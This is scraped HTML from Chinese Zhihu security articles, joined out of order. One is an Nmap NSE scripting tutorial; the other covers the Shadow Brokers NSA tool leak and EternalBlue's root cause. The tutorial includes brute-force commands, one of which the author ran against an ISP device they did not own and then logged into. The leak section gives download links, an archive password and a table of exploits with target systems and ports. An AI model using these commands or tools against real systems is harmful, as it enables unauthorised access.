&/code&&/pre&&/div&&p&那么可以看到，返回了两个nse脚本名称，那么第一个就是telnet爆破的脚本了，如果不清楚的话，可以使用上面刚介绍过的&b&--script-help&/b&参数。&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&root@ThundeRobot:/usr/share/nmap# nmap --script-help=telnet-brute
Starting Nmap 7.01 ( https://nmap.org ) at
telnet-brute
Categories: brute intrusive
https://nmap.org/nsedoc/scripts/telnet-brute.html
Performs brute-force password auditing against telnet servers.
&/code&&/pre&&/div&&p&可以看到 有一个Nmap的文档地址，正是我们现在想要使用的脚本的详细信息。&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s &target&
&/code&&/pre&&/div&&p&笔者就直接照搬官网文档的例子了。经常做安全测试的朋友肯定看一眼就会用了。&/p&&p&最后那个 target指的是我们的目标地址。userdb是用户名字典，passdb是密码字典，timeout是每次连接之间的等待超时时间。&br&&/p&&p&当然了，我们也可以直接查看脚本源文件：&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&---
nmap -p 23 --script telnet-brute \
--script-args userdb=myusers.lst,passdb=mypwds.lst \
--script-args telnet-brute.timeout=8s \
-- @output
-- 23/tcp open
-- | telnet-brute:
wkurtz:colonel
Statistics
Performed 15 guesses in 19 seconds, average tps: 0
-- @args telnet-brute.timeout
Connection time-out timespec (default: &5s&)
-- @args telnet-brute.autosize
Whether to automatically reduce the thread
count based on the behavior of the target
(default: &true&)
author = &nnposter&
license = &Same as Nmap--See https://nmap.org/book/man-legal.html&
categories = {'brute', 'intrusive'}
portrule = shortport.port_or_service(23, 'telnet')
&/code&&/pre&&/div&&p&上方这块，可以看到有一个例子，还有常规的扫描结果。那么加粗的这行是笔者故意为之，因为在某些情况下，&b&管理员可能会更改telnet服务的端口&/b&（这里不只是光指Telnet），那么我们就无法使用这个脚本了。聪明的你一定想到了更改上方的&b&23&/b&端口吧！但是这还不够灵活～ 我们可以将端口号自制成一个变量，通过我们的脚本参数传递进去。这里不再过多赘述，有违文章主体。&/p&&p&等等……还记得我们的-sC参数吗？其实它等价与--script=default，那么default调用了那些脚本呢？&/p&&p&在这里： &br&&/p&&p&&a href=&https://link.zhihu.com/?target=https%3A//nmap.org/nsedoc/categories/default.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&default NSE Category&/a&&/p&&p&点进去你一定会惊讶，为什么会调用那么多，而且会影响扫描速度（懒人方案）。所以最好的方案就是根据服务去手动调用合适的脚本。&/p&&p&下面我们来实战一下，今日刚发现的运营商漏洞，就出在Telnet上。&/p&&p&我家上网是没有分配公网IP的，就是路由那里是一个内网，于是我先用nmap探测了一下这个内网，发现有某些网络设备。&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&nmap -sT -Pn -F 10.14.16.0/24
&/code&&/pre&&/div&&p&我在结果中发现了一台主机的信息：&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&Nmap scan report for bogon (10.14.16.106)
Host is up (0.021s latency).
Not shown: 95 filtered ports
STATE SERVICE
blackice-icecap
49152/tcp open
&/code&&/pre&&/div&&p&作为一个搞Web安全的，首先去看的是8081……但是未果。于是准备从Telnet碰碰运气，会不会运营商也用若口令？&/p&&p&我把字典放到了&b& /usr/share/nmap/nselib/data&/b&，因为这个目录中是专门存放Nmap默认字典的。&/p&&p&扫描命令如下：&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&nmap -p 23 -Pn --script=telnet-brute --script-args=userdb=admin.lst,passdb=passwords.lst,telnet-brute.timeout=3s --script-trace 10.14.16.106
&/code&&/pre&&/div&&p&在这我用&b&--script-trace&/b&开启了数据的收发开关：&/p&&p&&figure&&img src=&https://pic1.zhimg.com/v2-73f5ee7adea462a88e2ed10a1ea38c17_b.jpg& data-rawwidth=&1845& data-rawheight=&565& class=&origin_image zh-lightbox-thumb& width=&1845& data-original=&https://pic1.zhimg.com/v2-73f5ee7adea462a88e2ed10a1ea38c17_r.jpg&&&/figure&经过耐心等待，得到爆破结果：&/p&&p&&figure&&img src=&https://pic4.zhimg.com/v2-e66ccab37230dcc42749_b.jpg& data-rawwidth=&1772& data-rawheight=&621& class=&origin_image zh-lightbox-thumb& width=&1772& data-original=&https://pic4.zhimg.com/v2-e66ccab37230dcc42749_r.jpg&&&/figure&看来都是真的，童话原来不是谎言。&/p&&p&我们登录看看～&/p&&p&&figure&&img src=&https://pic3.zhimg.com/v2-ab1c2c86c1ef_b.jpg& data-rawwidth=&1085& data-rawheight=&568& class=&origin_image zh-lightbox-thumb& width=&1085& data-original=&https://pic3.zhimg.com/v2-ab1c2c86c1ef_r.jpg&&&/figure&What ? 多协议路由？&/p&&p&&figure&&img src=&https://pic3.zhimg.com/v2-1dae8e897b9c61c2e77ba_b.jpg& data-rawwidth=&1322& data-rawheight=&701& class=&origin_image zh-lightbox-thumb& width=&1322& data-original=&https://pic3.zhimg.com/v2-1dae8e897b9c61c2e77ba_r.jpg&&&/figure&为此我还复习了以前干网络工程的知识。这个不谈了。我们继续再来个例子 ～&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&root@ThundeRobot:/usr/share/nmap/nselib/data# nmap --script=http-ls vault.centos.org
Starting Nmap 7.01 ( https://nmap.org ) at
Nmap scan report for vault.centos.org (109.72.83.61)
Host is up (0.38s latency).
Other addresses for vault.centos.org (not scanned): 2607:ff28:0:28:5054:ff:fe4b:3e8a
Not shown: 998 filtered ports
STATE SERVICE
| http-ls: Volume /
maxfiles limit reached (10)
2.1/centos2-scripts-v1.tar
2.1/extras/
2.1/final/
2.1/source/
2.1/updates/
3.1/SRPMS/
3.1/addons/
873/tcp open
Nmap done: 1 IP address (1 host up) scanned in 58.35 seconds
root@ThundeRobot:/usr/share/nmap/nselib/data#
&/code&&/pre&&/div&&figure&&img src=&https://pic4.zhimg.com/v2-908c55fc25d6e4f8f1eb425_b.jpg& data-rawwidth=&1249& data-rawheight=&675& class=&origin_image zh-lightbox-thumb& width=&1249& data-original=&https://pic4.zhimg.com/v2-908c55fc25d6e4f8f1eb425_r.jpg&&&/figure&&p&这边是扫描了&a href=&https://link.zhihu.com/?target=http%3A//centos.org& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&centos.org&/span&&span class=&invisible&&&/span&&/a&的列目录的安全隐患。&/p&&p&HTTP认证爆破：&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span& nmap --script=http-brute dvwa.vuln.leafsec.com
&/code&&/pre&&/div&&h2&&figure&&img src=&https://pic1.zhimg.com/v2-f54aa3dccb5e3ddc0ab246f_b.jpg& data-rawwidth=&1332& data-rawheight=&599& class=&origin_image zh-lightbox-thumb& width=&1332& data-original=&https://pic1.zhimg.com/v2-f54aa3dccb5e3ddc0ab246f_r.jpg&&&/figure&0X03 延伸 &br&&/h2&&p&漏洞利用方面：&a href=&https://link.zhihu.com/?target=https%3A//nmap.org/nsedoc/categories/vuln.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&vuln NSE Category&/a&&/p&&p&权限验证方面：&a href=&https://link.zhihu.com/?target=https%3A//nmap.org/nsedoc/categories/auth.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&auth NSE Category&/a& &/p&&p&暴力破解方面：&a href=&https://link.zhihu.com/?target=https%3A//nmap.org/nsedoc/categories/brute.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&brute NSE Category&/a&&/p&&p&服务信息发现：&a href=&https://link.zhihu.com/?target=https%3A//nmap.org/nsedoc/categories/discovery.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&discovery NSE Category&/a& &/p&&p&DOS攻击方面：&a href=&https://link.zhihu.com/?target=https%3A//nmap.org/nsedoc/categories/dos.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&dos NSE Category&/a&&/p&&p&漏洞利用方面：&a href=&https://link.zhihu.com/?target=https%3A//nmap.org/nsedoc/categories/exploit.html& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&nmap.org/nsedoc/categor&/span&&span class=&invisible&&ies/exploit.html&/span&&span class=&ellipsis&&&/span&&/a&&/p&&p&外部扩展方面：&a href=&https://link.zhihu.com/?target=https%3A//nmap.org/nsedoc/categories/external.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&external NSE Category&/a& （集成了shodanAPI）&/p&&p&FUZZ测试方面：&a href=&https://link.zhihu.com/?target=https%3A//nmap.org/nsedoc/categories/fuzzer.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&fuzzer NSE Category&/a&&/p&&p&一些针对的服务入侵模块：&a href=&https://link.zhihu.com/?target=https%3A//nmap.org/nsedoc/categories/intrusive.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&intrusive NSE Category&/a&&/p&&p&恶意后门方面：&a href=&https://link.zhihu.com/?target=https%3A//nmap.org/nsedoc/categories/malware.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&malware NSE Category&/a&&/p&&p&版本识别：&a href=&https://link.zhihu.com/?target=https%3A//nmap.org/nsedoc/categories/version.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&version NSE Category&/a&&/p&&blockquote&auth&br&broadcast&br&brute&br&default&br&discovery&br&dos&br&exploit&br&external&br&fuzzer&br&intrusive&br&malware &br&safe&br&version&br&vuln &br&&br&all &/blockquote&&br&&p&以上参数都可以作为&b&--script&/b&的通配参数，例如：&b&--script=vuln &/b&&/p&&p&-&b&-script=all&/b& 调用所有脚本扫描
&br&&/p&&h2&0x04 总结&br&&/h2&&p& 这篇文章没什么技术含量，只是弹性较高，算是一个小干货了，Nmap可以做数据库、系统、协议、网络等方面的评估。就是因为插件很丰富，省时省力。也希望大家在使用工具的同时细心一点，多做总结，&b&这些脚本都是可以继续优化起来的。&/b&那么就先到此结束啦～
另外关于字典，我们可以让nmap的字典更加强大，全部放到&b&nmap/nselib/data&/b&就可以了，方便后期的调用与整理。&/p&&p&如果你有更好的优质文章想要分享：&a href=&https://zhuanlan.zhihu.com/p/& class=&internal&&一叶知安征稿 - 知乎专栏&/a&&/p&&p&&b&如果你想要与我交流技术，可以加我的微信号：Guest_Killer_0nlis，我拉你进一叶知安读者群。 &/b&&/p&
0x00 介绍本文由 一叶知安作者：倾旋 原创。未经许可，严禁转载！ nmap是一个网络连接端扫描软件，用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端，并且推断计算机运行哪个操作系统。它是网络管理员必用的软件之一，以及用以评估网络系统…
&figure&&img src=&https://pic3.zhimg.com/v2-acc1bac15a6effd4eb06984_b.jpg& data-rawwidth=&721& data-rawheight=&399& class=&origin_image zh-lightbox-thumb& width=&721& data-original=&https://pic3.zhimg.com/v2-acc1bac15a6effd4eb06984_r.jpg&&&/figure&&p&前阵子Shadow Brokers泄露了NSA的一批黑客工具包，引起了一场网络大地震，其中包含了多个Windows 远程漏洞利用工具，覆盖了全球
70% 的 Windows 服务器，包括Windows NT、Windows 2000、Windows XP、Windows
2003、Windows Vista、Windows 7、Windows 8，Windows 2008、Windows 2008
R2、Windows Server 2012 SP0，任何人都可以直接下载并远程攻击利用。&/p&&b&下载地址&/b&：&a href=&https://link.zhihu.com/?target=https%3A//yadi.sk/d/NJqzpqo_3GxZA4& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&yadi.sk/d/NJqzpqo_3GxZA&/span&&span class=&invisible&&4&/span&&span class=&ellipsis&&&/span&&/a&&p&&b&解压密码&/b&：Reeeeeeeeeeeeeee
&/p&&p&&b&github下载地址&/b&：&a href=&https://link.zhihu.com/?target=https%3A//github.com/misterch0c/shadowbroker& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&github.com/misterch0c/s&/span&&span class=&invisible&&hadowbroker&/span&&span class=&ellipsis&&&/span&&/a&&br&&/p&
&p&释放的工具总共包含三个文件夹，&/p&
&ul&&li&Swift：包含了NSA对SWIFT银行系统发动攻击的相关证据，其中有EastNets的一些PPT文档、相关的证据、一些登录凭证和内部架构，EastNets是中东最大的SWIFT服务机构之一。&/li&&li&OddJob：包含一个基于Windows的植入软件，并包括所指定的配置文件和payload。适用于Windows Server 2003 Enterprise（甚至Windows XP Professional）&/li&&li&Windows：包含对Windows操作系统的许多黑客工具，但主要针对的是较旧版本的Windows（Windows XP中）和Server 2003。&/li&&/ul&&h3&&b&主要工具&/b&&/h3&
&p&&i&FUZZBUNCH&/i&：一款类似Metasploit的Exploit框架&/p&&p&
==&影响系统
==&默认端口&/p&&ol&&li&Easypi ==& IBM Lotus Notes漏洞==&Windows NT, 2000 ,XP, 2003==&3264 &/li&&li&Easybee ==&
MDaemon WorldClient电子邮件服务器漏洞 ==&
WorldClient 9.5, 9.6, 10.0, 10.1&/li&&li&Eternalblue ==&
SMBv2漏洞(MS17-010) ==&
Windows XP(32),Windows Server /64),Windows 7(32/64) ==&
139/445&/li&&li&Doublepulsar ==&
SMB和NBT漏洞
Windows XP(32), Vista, 7, Windows Server , 2008 R2 ==&
139/445 &/li&&li&Eternalromance ==&
SMBv1漏洞(MS17-010)和 NBT漏洞 ==&
Windows XP, Vista, 7, Windows Server , 2008 R2 ==&
139/445 &/li&&li&Eternalchampion ==& SMB和NBT漏洞 ==&
Windows XP, Vista, 7, Windows Server , 12, Windows 8 SP0 ==&
139/445&/li&&li& Eternalsynergy ==&
SMB和NBT漏洞 ==&
Windows 8, Windows Server 2012 ==&
139/445 &/li&&li&Explodingcan ==&
IIS6.0远程利用漏洞 ==&
Windows Server 2003 ==&
80 &/li&&li&Emphasismine ==&
IMAP漏洞 ==&
IBM Lotus Domino 6.5.4, 6.5.5, 7.0, 8.0, 8.5 ==&
143 &/li&&li&Ewokfrenzy ==&
IMAP漏洞 ==&
IBM Lotus Domino 6.5.4, 7.0.2
== &143 &/li&&li&Englishmansdentist ==&
==& ==&25 &/li&&li&Erraticgopher ==&
RPC漏洞 ==&
Windows XP SP3, Windows 2003 ==&
445 &/li&&li&Eskimoroll ==&
kerberos漏洞 ==&
Windows , 08, 2008 R2 ==&
88 &/li&&li&Eclipsedwing ==&
MS08-067漏洞 ==&
Windows 2000, XP, 2003 ==&
139/445 &/li&&li&Educatedscholar ==&
MS09-050漏洞 ==&
Windows vista, 2008 ==&
445 &/li&&li&Emeraldthread ==&
SMB和NBT漏洞 ==&
Windows XP, 2003 ==&
139/445 &/li&&li&Zippybeer ==&
SMTP漏洞 ==&
==& 445 &/li&&li&Esteemaudit ==&
RDP漏洞 ==&
Windows XP, Windows Server 2003 ==&
&/li&&/ol&&h3&&b&ETERNALBLUE攻击原理分析&/b&&/h3&
&p&ETERNALBLUE是一个RCE漏洞利用，通过SMB（Server Message Block）和NBT（NetBIOS over TCP/IP）影响Windows XP,Windows 2008 R2和Windows 7系统。&br&&/p&&ul&&li&
漏洞发生处：C:\Windows\System32\drivers\srv.sys (注：srv.sys是Windows系统驱动文件，是微软默认的信任文件。&/li&&br&&li&
漏洞函数：unsigned int __fastcall SrvOs2FeaToNt(int a1, int a2)&/li&&br&&li&
触发点：_memmove(v5, (const void *)(a2 + 5 + *(_BYTE *)(a1 + 5)), *(_WORD *)(a1 + 6));&/li&&br&&li&
原因：逻辑不正确导致的越界写入&/li&&/ul&&p&
官方补丁修复前：&/p&
&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&int __fastcall SrvOs2FeaListSizeToNt(_DWORD *a1)
while (v3 = v4 || (v7 = *(_BYTE *)(v3 + 1) + *(_WORD *)(v3 + 2), v7 + v3